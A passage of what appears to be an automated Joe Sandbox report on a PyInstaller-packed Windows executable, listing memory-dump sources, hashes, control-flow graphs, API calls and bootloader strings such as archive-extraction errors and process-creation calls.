                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _get_daylight_invalid_parameter_noinfo$BoundaryDeleteDescriptorErrorInformationLastTimeZone
                                                        • String ID: Eastern Standard Time$Eastern Summer Time
                                                        • API String ID: 1511944507-239921721
                                                        • Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                        • Instruction ID: 1ee1c571f09b7f6e81a1944ec8f45361ced6a219d31953b84bf78c8fa43bf682
                                                        • Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                        • Instruction Fuzzy Hash: 5651A23EE48642A6F710FF35E8935AAA361BF48B84FC041B5DA0D83695DF3DE401A760
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: CurrentFeaturePresentProcessProcessor
                                                        • String ID:
                                                        • API String ID: 1010374628-0
                                                        • Opcode ID: 08e5aa8e339564cd7a7b65546afe2f45283a9087c0a557908bbbf8b75e3d7d61
                                                        • Instruction ID: 4bb4cf1a7cdab0152acf8fcff8eb998b0680c7cc3f263eb2fefff20e69c83e82
                                                        • Opcode Fuzzy Hash: 08e5aa8e339564cd7a7b65546afe2f45283a9087c0a557908bbbf8b75e3d7d61
                                                        • Instruction Fuzzy Hash: 6B02BE6DE8D64760FE54BB21A403679A290AF40F90FC546B8ED6E477D2DF3EE401A320

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 0 7ff73ae11710-7ff73ae11724 1 7ff73ae1173e-7ff73ae11742 0->1 2 7ff73ae11726-7ff73ae1173d call 7ff73ae12b30 0->2 4 7ff73ae11768-7ff73ae1178b call 7ff73ae17c10 1->4 5 7ff73ae11744-7ff73ae1174d call 7ff73ae112b0 1->5 13 7ff73ae117b9-7ff73ae117d4 call 7ff73ae13fd0 4->13 14 7ff73ae1178d-7ff73ae117b8 call 7ff73ae12890 4->14 11 7ff73ae1175f-7ff73ae11767 5->11 12 7ff73ae1174f-7ff73ae1175a call 7ff73ae12b30 5->12 12->11 20 7ff73ae117ee-7ff73ae11801 call 7ff73ae20814 13->20 21 7ff73ae117d6-7ff73ae117e9 call 7ff73ae12b30 13->21 26 7ff73ae11823-7ff73ae11827 20->26 27 7ff73ae11803-7ff73ae1181e call 7ff73ae12890 20->27 28 7ff73ae1192f-7ff73ae11932 call 7ff73ae2018c 21->28 31 7ff73ae11829-7ff73ae11835 call 7ff73ae11050 26->31 32 7ff73ae11841-7ff73ae11861 call 7ff73ae24f90 26->32 37 7ff73ae11927-7ff73ae1192a call 7ff73ae2018c 27->37 34 7ff73ae11937-7ff73ae1194e 28->34 38 7ff73ae1183a-7ff73ae1183c 31->38 41 7ff73ae11882-7ff73ae11888 32->41 42 7ff73ae11863-7ff73ae1187d call 7ff73ae12890 32->42 37->28 38->37 43 7ff73ae1188e-7ff73ae11897 41->43 44 7ff73ae11915-7ff73ae11918 call 7ff73ae24f7c 41->44 49 7ff73ae1191d-7ff73ae11922 42->49 47 7ff73ae118a0-7ff73ae118c2 call 7ff73ae204dc 43->47 44->49 52 7ff73ae118c4-7ff73ae118dc call 7ff73ae20c1c 47->52 53 7ff73ae118f5-7ff73ae118fc 47->53 49->37 58 7ff73ae118de-7ff73ae118e1 52->58 59 7ff73ae118e5-7ff73ae118f3 52->59 55 7ff73ae11903-7ff73ae1190b call 7ff73ae12890 53->55 62 7ff73ae11910 55->62 58->47 61 7ff73ae118e3 58->61 59->55 61->62 62->44
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message
                                                        • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                        • API String ID: 2030045667-3833288071
                                                        • Opcode ID: 8d543000d0a9e61aac4613412ca15ec1440084bab73dcce257313c2f9e944cd2
                                                        • Instruction ID: 3a5e395ac1a3f65a2ced9ca34ba5405e01e0f62486d58330d35c4dfb4c1b96c0
                                                        • Opcode Fuzzy Hash: 8d543000d0a9e61aac4613412ca15ec1440084bab73dcce257313c2f9e944cd2
                                                        • Instruction Fuzzy Hash: C951CD6DF88652A2FA10BB11E8432B9E390FF45B94FC440B8DE0D076D5EF2DE644A320

                                                        Control-flow Graph

                                                        APIs
                                                        • GetCurrentProcess.KERNEL32(0000000100000001,00007FF73AE1414C,00007FF73AE17911,?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18990
                                                        • OpenProcessToken.ADVAPI32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE189A1
                                                        • GetTokenInformation.KERNELBASE(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE189C3
                                                        • GetLastError.KERNEL32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE189CD
                                                        • GetTokenInformation.KERNELBASE(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A0A
                                                        • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF73AE18A1C
                                                        • CloseHandle.KERNEL32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A34
                                                        • LocalFree.KERNEL32(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A66
                                                        • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF73AE18A8D
                                                        • CreateDirectoryW.KERNELBASE(?,00007FF73AE17D26,?,00007FF73AE11785), ref: 00007FF73AE18A9E
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                        • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                        • API String ID: 4998090-2855260032
                                                        • Opcode ID: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
                                                        • Instruction ID: 0f1bbbb9ed30e6181fe482f03fecf30700191c121eead04873fe4b8f5df4d535
                                                        • Opcode Fuzzy Hash: ab9c5a43b78f2aabbf64520a1e8ab8c22bfb93026fd8015a1f934939a7f50004
                                                        • Instruction Fuzzy Hash: 5B41C435A58A8692F750BF50E4876AAB361FF84B90F8402B1EA5E476D4DF3CE404DB10

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: _fread_nolock$Message
                                                        • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                        • API String ID: 677216364-1384898525
                                                        • Opcode ID: bbe49a02ff42bb8f6069a8a0c8b844031400ba91864927a1a752276503176bfa
                                                        • Instruction ID: dcd53554f04c7ced0cfb73a3e14e10f1a3fb3b51b4b4926a38923a01f1e8569f
                                                        • Opcode Fuzzy Hash: bbe49a02ff42bb8f6069a8a0c8b844031400ba91864927a1a752276503176bfa
                                                        • Instruction Fuzzy Hash: 0E51D379B48612A6FB18FF28D443178B3A0EF88B84B9581B9D90D43795DE3CE441D754

                                                        Control-flow Graph

                                                        APIs
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                        • String ID: CreateProcessW$Error creating child process!
                                                        • API String ID: 2895956056-3524285272
                                                        • Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                        • Instruction ID: b353aaa925fa2b7c1d338ea87f18887b928a9e248afd20497811f078d439efe2
                                                        • Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                        • Instruction Fuzzy Hash: B3415336A4878592EA20BB64E4572AAF3A0FF94760F800779E6AD437D5DF7CD044DB10

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 381 7ff73ae11000-7ff73ae139d6 call 7ff73ae1ff60 call 7ff73ae1ff58 call 7ff73ae186b0 call 7ff73ae1ff58 call 7ff73ae1bc60 call 7ff73ae252f0 call 7ff73ae25ef8 call 7ff73ae11eb0 399 7ff73ae139dc-7ff73ae139ec call 7ff73ae13ec0 381->399 400 7ff73ae13ad2 381->400 399->400 405 7ff73ae139f2-7ff73ae13a05 call 7ff73ae13d90 399->405 401 7ff73ae13ad7-7ff73ae13af7 call 7ff73ae1bcc0 400->401 405->400 409 7ff73ae13a0b-7ff73ae13a32 call 7ff73ae17b60 405->409 412 7ff73ae13a74-7ff73ae13a9c call 7ff73ae18040 call 7ff73ae11cb0 409->412 413 7ff73ae13a34-7ff73ae13a43 call 7ff73ae17b60 409->413 423 7ff73ae13b71-7ff73ae13b82 412->423 424 7ff73ae13aa2-7ff73ae13ab8 call 7ff73ae11cb0 412->424 413->412 419 7ff73ae13a45-7ff73ae13a4b 413->419 421 7ff73ae13a57-7ff73ae13a71 call 7ff73ae24f7c call 7ff73ae18040 419->421 422 7ff73ae13a4d-7ff73ae13a55 419->422 421->412 422->421 427 7ff73ae13b9e-7ff73ae13ba1 423->427 428 7ff73ae13b84-7ff73ae13b8b 423->428 438 7ff73ae13af8-7ff73ae13afb 424->438 439 7ff73ae13aba-7ff73ae13acd call 7ff73ae12b30 424->439 430 7ff73ae13bb7-7ff73ae13bcf call 7ff73ae18ae0 427->430 431 7ff73ae13ba3-7ff73ae13ba9 427->431 428->427 433 7ff73ae13b8d-7ff73ae13b90 call 7ff73ae114f0 428->433 448 7ff73ae13bd1-7ff73ae13bdd call 7ff73ae12b30 430->448 449 7ff73ae13be2-7ff73ae13be9 SetDllDirectoryW 430->449 435 7ff73ae13bab-7ff73ae13bb5 431->435 436 7ff73ae13bef-7ff73ae13bfc call 7ff73ae16de0 431->436 442 7ff73ae13b95-7ff73ae13b98 433->442 435->430 435->436 453 7ff73ae13c47-7ff73ae13c4c call 7ff73ae16d60 436->453 454 7ff73ae13bfe-7ff73ae13c0b call 7ff73ae16a90 436->454 438->423 446 7ff73ae13afd-7ff73ae13b14 call 7ff73ae13fd0 438->446 439->400 442->400 442->427 455 7ff73ae13b1b-7ff73ae13b47 call 7ff73ae182b0 446->455 456 7ff73ae13b16-7ff73ae13b19 446->456 448->400 449->436 463 7ff73ae13c51-7ff73ae13c54 453->463 454->453 464 7ff73ae13c0d-7ff73ae13c1c call 7ff73ae165f0 454->464 455->423 472 7ff73ae13b49-7ff73ae13b51 call 7ff73ae2018c 455->472 461 7ff73ae13b56-7ff73ae13b6c call 7ff73ae12b30 456->461 461->400 467 7ff73ae13c5a-7ff73ae13c67 463->467 468 7ff73ae13d06-7ff73ae13d15 call 7ff73ae134c0 463->468 481 7ff73ae13c3d-7ff73ae13c42 call 7ff73ae16840 464->481 482 7ff73ae13c1e-7ff73ae13c2a call 7ff73ae16570 464->482 469 7ff73ae13c70-7ff73ae13c7a 467->469 468->400 483 7ff73ae13d1b-7ff73ae13d6f call 7ff73ae17fd0 call 7ff73ae17b60 call 7ff73ae13620 call 7ff73ae18080 call 7ff73ae16840 call 7ff73ae16d60 468->483 474 7ff73ae13c7c-7ff73ae13c81 469->474 475 7ff73ae13c83-7ff73ae13c85 469->475 472->461 474->469 474->475 479 7ff73ae13c87-7ff73ae13caa call 7ff73ae11ef0 475->479 480 7ff73ae13cd1-7ff73ae13d01 call 7ff73ae13620 call 7ff73ae13460 call 7ff73ae13610 call 7ff73ae16840 call 7ff73ae16d60 475->480 479->400 494 7ff73ae13cb0-7ff73ae13cba 479->494 480->401 481->453 482->481 495 7ff73ae13c2c-7ff73ae13c3b call 7ff73ae16c30 482->495 517 7ff73ae13d7d-7ff73ae13d80 call 7ff73ae11e80 483->517 518 7ff73ae13d71-7ff73ae13d78 call 7ff73ae17d40 483->518 498 7ff73ae13cc0-7ff73ae13ccf 494->498 495->463 498->480 498->498 521 7ff73ae13d85-7ff73ae13d87 517->521 518->517 521->401
                                                        APIs
                                                          • Part of subcall function 00007FF73AE13EC0: GetModuleFileNameW.KERNEL32(?,00007FF73AE139EA), ref: 00007FF73AE13EF1
                                                        • SetDllDirectoryW.KERNEL32 ref: 00007FF73AE13BE9
                                                          • Part of subcall function 00007FF73AE17B60: GetEnvironmentVariableW.KERNEL32(00007FF73AE13A1F), ref: 00007FF73AE17B9A
                                                          • Part of subcall function 00007FF73AE17B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF73AE17BB7
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                        • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                        • API String ID: 2344891160-3602715111
                                                        • Opcode ID: 9174f193ed7eca1f2d69d628f40356def006f7af56e9b2c407063a7bc6871f08
                                                        • Instruction ID: 943e431a9c5b621ef1a4093f844ee649da82f09259db35f1a8cf77f3ef1b1c5e
                                                        • Opcode Fuzzy Hash: 9174f193ed7eca1f2d69d628f40356def006f7af56e9b2c407063a7bc6871f08
                                                        • Instruction Fuzzy Hash: ADB1A129B9C6A761FA64BB21D4532BDE250BF44B84FC001F1EA4D476D6EF2CE505E720

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 522 7ff73ae11050-7ff73ae110ab call 7ff73ae1b4e0 525 7ff73ae110ad-7ff73ae110d2 call 7ff73ae12b30 522->525 526 7ff73ae110d3-7ff73ae110eb call 7ff73ae24f90 522->526 531 7ff73ae11109-7ff73ae11119 call 7ff73ae24f90 526->531 532 7ff73ae110ed-7ff73ae11104 call 7ff73ae12890 526->532 538 7ff73ae11137-7ff73ae11147 531->538 539 7ff73ae1111b-7ff73ae11132 call 7ff73ae12890 531->539 537 7ff73ae1126c-7ff73ae112a0 call 7ff73ae1b1c0 call 7ff73ae24f7c * 2 532->537 541 7ff73ae11150-7ff73ae11175 call 7ff73ae204dc 538->541 539->537 548 7ff73ae1117b-7ff73ae11185 call 7ff73ae20250 541->548 549 7ff73ae1125e 541->549 548->549 556 7ff73ae1118b-7ff73ae11197 548->556 551 7ff73ae11264 549->551 551->537 557 7ff73ae111a0-7ff73ae111c8 call 7ff73ae19990 556->557 560 7ff73ae111ca-7ff73ae111cd 557->560 561 7ff73ae11241-7ff73ae1125c call 7ff73ae12b30 557->561 562 7ff73ae1123c 560->562 563 7ff73ae111cf-7ff73ae111d9 560->563 561->551 562->561 565 7ff73ae111db-7ff73ae111e8 call 7ff73ae20c1c 563->565 566 7ff73ae11203-7ff73ae11206 563->566 572 7ff73ae111ed-7ff73ae111f0 565->572 569 7ff73ae11208-7ff73ae11216 call 7ff73ae1ca40 566->569 570 7ff73ae11219-7ff73ae1121e 566->570 569->570 570->557 571 7ff73ae11220-7ff73ae11223 570->571 574 7ff73ae11237-7ff73ae1123a 571->574 575 7ff73ae11225-7ff73ae11228 571->575 576 7ff73ae111fe-7ff73ae11201 572->576 577 7ff73ae111f2-7ff73ae111fc call 7ff73ae20250 572->577 574->551 575->561 579 7ff73ae1122a-7ff73ae11232 575->579 576->561 577->570 577->576 579->541
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: Message
                                                        • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                        • API String ID: 2030045667-1655038675
                                                        • Opcode ID: 823071f863a1d59b6c76fe4c232cca6c24b562ef25e432f227cb282b45ea7afb
                                                        • Instruction ID: 0205118d3dbccb6e4e1bcf42fa57f968c52e0735ccfa69d5f123079285ecb89e
                                                        • Opcode Fuzzy Hash: 823071f863a1d59b6c76fe4c232cca6c24b562ef25e432f227cb282b45ea7afb
                                                        • Instruction Fuzzy Hash: 1651E42AA48692A5FA20BB15E4433BAE290FF84794F8441B9DD4E477C5EF3CE505E710

                                                        Control-flow Graph

                                                        APIs
                                                        • FreeLibrary.KERNEL32(?,?,?,00007FF73AE2F56A,?,?,-00000018,00007FF73AE2B317,?,?,?,00007FF73AE2B20E,?,?,?,00007FF73AE26452), ref: 00007FF73AE2F34C
                                                        • GetProcAddress.KERNEL32(?,?,?,00007FF73AE2F56A,?,?,-00000018,00007FF73AE2B317,?,?,?,00007FF73AE2B20E,?,?,?,00007FF73AE26452), ref: 00007FF73AE2F358
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
                                                        • Associated: 00000000.00000002.2344865082.00007FF73AE10000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2344958078.00007FF73AE3B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE4E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345006379.00007FF73AE50000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2345087431.00007FF73AE52000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_7ff73ae10000_#U202f#U202f#U2005#U00a0.jbxd
                                                        Similarity
                                                        • API ID: AddressFreeLibraryProc
                                                        • String ID: api-ms-$ext-ms-
                                                        • API String ID: 3013587201-537541572
                                                        • Opcode ID: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                        • Instruction ID: 7b0798dd333265267a3898bbcb07aa709777b6f794a8ee7849fe4a73162787e3
                                                        • Opcode Fuzzy Hash: d2429d82f74935346a71535361e23a0a0fd68cfa18870ede5d154c99e1daa8a5
                                                        • Instruction Fuzzy Hash: C241782AB99A06A1FA25FB169C03175A391BF49BE0FC84178DD0D47784DF3CE459A320

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 679 7ff73ae2c01c-7ff73ae2c042 680 7ff73ae2c05d-7ff73ae2c061 679->680 681 7ff73ae2c044-7ff73ae2c058 call 7ff73ae254a4 call 7ff73ae254c4 679->681 683 7ff73ae2c437-7ff73ae2c443 call 7ff73ae254a4 call 7ff73ae254c4 680->683 684 7ff73ae2c067-7ff73ae2c06e 680->684 697 7ff73ae2c44e 681->697 703 7ff73ae2c449 call 7ff73ae2aea4 683->703 684->683 686 7ff73ae2c074-7ff73ae2c0a2 684->686 686->683 689 7ff73ae2c0a8-7ff73ae2c0af 686->689 692 7ff73ae2c0c8-7ff73ae2c0cb 689->692 693 7ff73ae2c0b1-7ff73ae2c0c3 call 7ff73ae254a4 call 7ff73ae254c4 689->693 695 7ff73ae2c0d1-7ff73ae2c0d7 692->695 696 7ff73ae2c433-7ff73ae2c435 692->696 693->703 695->696 701 7ff73ae2c0dd-7ff73ae2c0e0 695->701 700 7ff73ae2c451-7ff73ae2c468 696->700 697->700 701->693 704 7ff73ae2c0e2-7ff73ae2c107 701->704 703->697 707 7ff73ae2c109-7ff73ae2c10b 704->707 708 7ff73ae2c13a-7ff73ae2c141 704->708 710 7ff73ae2c10d-7ff73ae2c114 707->710 711 7ff73ae2c132-7ff73ae2c138 707->711 712 7ff73ae2c116-7ff73ae2c12d call 7ff73ae254a4 call 7ff73ae254c4 call 7ff73ae2aea4 708->712 713 7ff73ae2c143-7ff73ae2c16b call 7ff73ae2dbbc call 7ff73ae2af0c * 2 708->713 710->711 710->712 716 7ff73ae2c1b8-7ff73ae2c1cf 711->716 744 7ff73ae2c2c0 712->744 740 7ff73ae2c188-7ff73ae2c1b3 call 7ff73ae2c844 713->740 741 7ff73ae2c16d-7ff73ae2c183 call 7ff73ae254c4 call 7ff73ae254a4 713->741 719 7ff73ae2c24a-7ff73ae2c254 call 7ff73ae33f8c 716->719 720 7ff73ae2c1d1-7ff73ae2c1d9 716->720 732 7ff73ae2c25a-7ff73ae2c26f 719->732 733 7ff73ae2c2de 719->733 720->719 721 7ff73ae2c1db-7ff73ae2c1dd 720->721 721->719 725 7ff73ae2c1df-7ff73ae2c1f5 721->725 725->719 729 7ff73ae2c1f7-7ff73ae2c203 725->729 729->719 734 7ff73ae2c205-7ff73ae2c207 729->734 732->733 738 7ff73ae2c271-7ff73ae2c283 GetConsoleMode 732->738 736 7ff73ae2c2e3-7ff73ae2c303 ReadFile 733->736 734->719 739 7ff73ae2c209-7ff73ae2c221 734->739 742 7ff73ae2c309-7ff73ae2c311 736->742 743 7ff73ae2c3fd-7ff73ae2c406 GetLastError 736->743 738->733 745 7ff73ae2c285-7ff73ae2c28d 738->745 739->719 749 7ff73ae2c223-7ff73ae2c22f 739->749 740->716 741->744 742->743 751 7ff73ae2c317 742->751 746 7ff73ae2c408-7ff73ae2c41e call 7ff73ae254c4 call 7ff73ae254a4 743->746 747 7ff73ae2c423-7ff73ae2c426 743->747 748 7ff73ae2c2c3-7ff73ae2c2cd call 7ff73ae2af0c 744->748 745->736 753 7ff73ae2c28f-7ff73ae2c2b1 ReadConsoleW 745->753 746->744 757 7ff73ae2c2b9-7ff73ae2c2bb call 7ff73ae25438 747->757 758 7ff73ae2c42c-7ff73ae2c42e 747->758 748->700 749->719 756 7ff73ae2c231-7ff73ae2c233 749->756 760 7ff73ae2c31e-7ff73ae2c333 751->760 762 7ff73ae2c2d2-7ff73ae2c2dc 753->762 763 7ff73ae2c2b3 GetLastError 753->763 756->719 767 7ff73ae2c235-7ff73ae2c245 756->767 757->744 758->748 760->748 769 7ff73ae2c335-7ff73ae2c340 760->769 762->760 763->757 767->719 772 7ff73ae2c367-7ff73ae2c36f 769->772 773 7ff73ae2c342-7ff73ae2c35b call 7ff73ae2bc34 769->773 774 7ff73ae2c3eb-7ff73ae2c3f8 call 7ff73ae2ba74 772->774 775 7ff73ae2c371-7ff73ae2c383 772->775 781 7ff73ae2c360-7ff73ae2c362 773->781 774->781 778 7ff73ae2c3de-7ff73ae2c3e6 775->778 779 7ff73ae2c385 775->779 778->748 782 7ff73ae2c38a-7ff73ae2c391 779->782 781->748 784 7ff73ae2c3cd-7ff73ae2c3d8 782->784 785 7ff73ae2c393-7ff73ae2c397 782->785 784->778 786 7ff73ae2c399-7ff73ae2c3a0 785->786 787 7ff73ae2c3b3 785->787 786->787 788 7ff73ae2c3a2-7ff73ae2c3a6 786->788 789 7ff73ae2c3b9-7ff73ae2c3c9 787->789 788->787 790 7ff73ae2c3a8-7ff73ae2c3b1 788->790 789->782 791 7ff73ae2c3cb 789->791 790->789 791->778
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2344905058.00007FF73AE11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF73AE10000, based on PE: true
